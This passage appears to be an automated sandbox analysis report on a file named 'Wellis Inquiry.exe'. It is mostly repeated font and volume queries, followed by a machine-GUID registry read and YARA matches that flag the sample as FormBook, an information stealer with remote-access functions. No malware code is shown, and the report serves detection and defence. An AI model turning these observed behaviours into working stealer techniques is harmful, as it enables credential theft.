Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
